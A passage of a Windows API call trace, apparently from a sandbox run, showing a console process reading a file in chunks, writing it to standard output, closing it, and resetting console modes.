lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.953] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.953] GetFileType (hFile=0x4c) returned 0x1 [0131.953] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.953] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef58*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.953] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.953] GetFileType (hFile=0x4c) returned 0x1 [0131.953] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.953] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cefa8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.953] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.953] GetFileType (hFile=0x4c) returned 0x1 [0131.953] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.953] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceff8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.953] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.953] GetFileType (hFile=0x4c) returned 0x1 [0131.953] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.953] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf048*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cf048*, lpNumberOfBytesWritten=0x1ce04c*=0x20, lpOverlapped=0x0) returned 1 [0131.953] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.953] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce038 | out: lpNewFilePointer=0x0) returned 1 [0131.953] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.953] ReadFile (in: hFile=0x54, lpBuffer=0x1cee68, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x1ce058, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesRead=0x1ce058*=0x200, lpOverlapped=0x0) returned 1 [0131.954] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.954] GetFileType (hFile=0x4c) returned 0x1 [0131.954] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.954] GetFileType (hFile=0x4c) returned 0x1 [0131.954] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.954] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.954] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.954] GetFileType (hFile=0x4c) returned 0x1 [0131.954] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.954] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceeb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceeb8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.954] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.954] GetFileType (hFile=0x4c) returned 0x1 [0131.954] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.954] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef08*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.954] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.954] GetFileType (hFile=0x4c) returned 0x1 [0131.954] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.954] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef58*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.954] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.954] GetFileType (hFile=0x4c) returned 0x1 [0131.954] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.954] WriteFile (in: 
hFile=0x4c, lpBuffer=0x1cefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cefa8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.954] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.954] GetFileType (hFile=0x4c) returned 0x1 [0131.954] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.954] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceff8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.954] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.954] GetFileType (hFile=0x4c) returned 0x1 [0131.954] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.954] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf048*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cf048*, lpNumberOfBytesWritten=0x1ce04c*=0x20, lpOverlapped=0x0) returned 1 [0131.954] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.954] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce038 | out: lpNewFilePointer=0x0) returned 1 [0131.955] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.955] ReadFile (in: hFile=0x54, lpBuffer=0x1cee68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce058, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesRead=0x1ce058*=0x200, lpOverlapped=0x0) returned 1 [0131.955] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.955] GetFileType (hFile=0x4c) returned 0x1 [0131.955] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.955] GetFileType (hFile=0x4c) returned 0x1 [0131.955] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.955] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.955] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0131.955] GetFileType (hFile=0x4c) returned 0x1 [0131.955] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.955] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceeb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceeb8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.955] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.955] GetFileType (hFile=0x4c) returned 0x1 [0131.955] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.955] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef08*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.955] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.955] GetFileType (hFile=0x4c) returned 0x1 [0131.955] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.955] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef58*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.955] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.955] GetFileType (hFile=0x4c) returned 0x1 [0131.955] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.955] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cefa8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.955] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.955] GetFileType (hFile=0x4c) returned 0x1 [0131.955] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.955] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceff8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.955] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0131.955] GetFileType (hFile=0x4c) returned 0x1 [0131.955] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.955] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf048*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cf048*, lpNumberOfBytesWritten=0x1ce04c*=0x20, lpOverlapped=0x0) returned 1 [0131.955] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.956] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce038 | out: lpNewFilePointer=0x0) returned 1 [0131.956] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.956] ReadFile (in: hFile=0x54, lpBuffer=0x1cee68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce058, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesRead=0x1ce058*=0x200, lpOverlapped=0x0) returned 1 [0131.956] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.956] GetFileType (hFile=0x4c) returned 0x1 [0131.956] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.956] GetFileType (hFile=0x4c) returned 0x1 [0131.956] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.956] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.956] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.956] GetFileType (hFile=0x4c) returned 0x1 [0131.956] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.956] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceeb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceeb8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.956] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.956] GetFileType (hFile=0x4c) returned 0x1 [0131.956] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.956] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, 
lpOverlapped=0x0 | out: lpBuffer=0x1cef08*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.956] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.956] GetFileType (hFile=0x4c) returned 0x1 [0131.956] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.956] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef58*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.956] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.956] GetFileType (hFile=0x4c) returned 0x1 [0131.956] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.956] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cefa8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.956] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.956] GetFileType (hFile=0x4c) returned 0x1 [0131.956] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.956] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceff8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.956] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.956] GetFileType (hFile=0x4c) returned 0x1 [0131.956] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.956] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf048*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cf048*, lpNumberOfBytesWritten=0x1ce04c*=0x20, lpOverlapped=0x0) returned 1 [0131.957] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.957] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce038 | out: lpNewFilePointer=0x0) returned 1 [0131.957] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.957] ReadFile (in: hFile=0x54, lpBuffer=0x1cee68, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce058, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesRead=0x1ce058*=0x200, lpOverlapped=0x0) returned 1 [0131.957] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.957] GetFileType (hFile=0x4c) returned 0x1 [0131.957] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.957] GetFileType (hFile=0x4c) returned 0x1 [0131.957] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.957] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.957] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.957] GetFileType (hFile=0x4c) returned 0x1 [0131.957] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.957] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceeb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceeb8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.957] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.957] GetFileType (hFile=0x4c) returned 0x1 [0131.957] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.957] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef08*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.957] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.957] GetFileType (hFile=0x4c) returned 0x1 [0131.957] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.957] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef58*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.957] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.957] GetFileType (hFile=0x4c) returned 0x1 [0131.957] _get_osfhandle (_FileHandle=1) returned 
0x4c [0131.957] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cefa8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.957] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.957] GetFileType (hFile=0x4c) returned 0x1 [0131.957] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.958] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceff8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.958] GetFileType (hFile=0x4c) returned 0x1 [0131.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.958] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf048*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cf048*, lpNumberOfBytesWritten=0x1ce04c*=0x20, lpOverlapped=0x0) returned 1 [0131.958] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.958] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce038 | out: lpNewFilePointer=0x0) returned 1 [0131.958] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.958] ReadFile (in: hFile=0x54, lpBuffer=0x1cee68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce058, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesRead=0x1ce058*=0x200, lpOverlapped=0x0) returned 1 [0131.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.958] GetFileType (hFile=0x4c) returned 0x1 [0131.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.958] GetFileType (hFile=0x4c) returned 0x1 [0131.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.958] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) 
returned 1 [0131.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.958] GetFileType (hFile=0x4c) returned 0x1 [0131.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.958] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceeb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceeb8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.958] GetFileType (hFile=0x4c) returned 0x1 [0131.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.958] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef08*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.958] GetFileType (hFile=0x4c) returned 0x1 [0131.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.958] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef58*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.958] GetFileType (hFile=0x4c) returned 0x1 [0131.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.958] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cefa8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.958] GetFileType (hFile=0x4c) returned 0x1 [0131.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.959] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceff8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.959] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0131.959] GetFileType (hFile=0x4c) returned 0x1 [0131.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.959] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf048*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cf048*, lpNumberOfBytesWritten=0x1ce04c*=0x20, lpOverlapped=0x0) returned 1 [0131.959] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.959] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce038 | out: lpNewFilePointer=0x0) returned 1 [0131.959] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.959] ReadFile (in: hFile=0x54, lpBuffer=0x1cee68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce058, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesRead=0x1ce058*=0x200, lpOverlapped=0x0) returned 1 [0131.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.959] GetFileType (hFile=0x4c) returned 0x1 [0131.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.959] GetFileType (hFile=0x4c) returned 0x1 [0131.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.959] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.959] GetFileType (hFile=0x4c) returned 0x1 [0131.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.959] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceeb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceeb8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.959] GetFileType (hFile=0x4c) returned 0x1 [0131.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.959] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef08*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef08*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.959] GetFileType (hFile=0x4c) returned 0x1 [0131.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.959] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef58*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.959] GetFileType (hFile=0x4c) returned 0x1 [0131.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.959] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cefa8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.959] GetFileType (hFile=0x4c) returned 0x1 [0131.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.960] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceff8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.960] GetFileType (hFile=0x4c) returned 0x1 [0131.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.960] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf048*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cf048*, lpNumberOfBytesWritten=0x1ce04c*=0x20, lpOverlapped=0x0) returned 1 [0131.960] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.960] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce038 | out: lpNewFilePointer=0x0) returned 1 [0131.960] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.960] ReadFile 
(in: hFile=0x54, lpBuffer=0x1cee68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce058, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesRead=0x1ce058*=0x32, lpOverlapped=0x0) returned 1 [0131.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.960] GetFileType (hFile=0x4c) returned 0x1 [0131.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.960] GetFileType (hFile=0x4c) returned 0x1 [0131.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.960] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee68*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesWritten=0x1ce04c*=0x32, lpOverlapped=0x0) returned 1 [0131.960] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.960] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce038 | out: lpNewFilePointer=0x0) returned 1 [0131.960] _close (_FileHandle=4) returned 0 [0131.960] FindNextFileW (in: hFindFile=0x340e50, lpFindFileData=0x1cf0cc | out: lpFindFileData=0x1cf0cc) returned 0 [0131.961] GetLastError () returned 0x12 [0131.961] FindClose (in: hFindFile=0x340e50 | out: hFindFile=0x340e50) returned 1 [0131.961] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0131.961] _close (_FileHandle=3) returned 0 [0131.961] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.961] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0131.962] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.962] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0131.962] _get_osfhandle (_FileHandle=0) returned 0x3 [0131.962] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0131.962] SetConsoleInputExeNameW () returned 0x1 [0131.962] GetConsoleOutputCP () returned 0x1b5 [0131.962] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.962] SetThreadUILanguage (LangId=0x0) 
